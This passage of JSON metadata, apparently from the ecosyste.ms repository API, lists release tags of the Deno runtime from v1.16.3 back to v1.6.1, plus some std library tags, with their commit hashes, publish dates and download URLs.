s/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/a